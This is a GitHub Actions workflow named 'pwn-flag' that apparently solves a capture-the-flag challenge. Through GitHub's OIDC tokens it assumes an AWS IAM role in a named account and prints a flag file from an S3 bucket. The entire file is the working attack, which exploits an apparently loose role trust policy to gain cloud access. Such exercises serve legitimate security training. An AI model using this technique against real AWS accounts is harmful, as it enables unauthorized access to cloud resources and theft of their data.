name: pwn-flag
on:
  push:
    branches: [ main ]
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  grab:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Configure AWS via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875
          role-session-name: oops-we-did-it
          aws-region: ap-southeast-1

      - name: Read flag
        run: |
          aws s3 cp s3://oh-i-really-do-care/flag.txt -
        
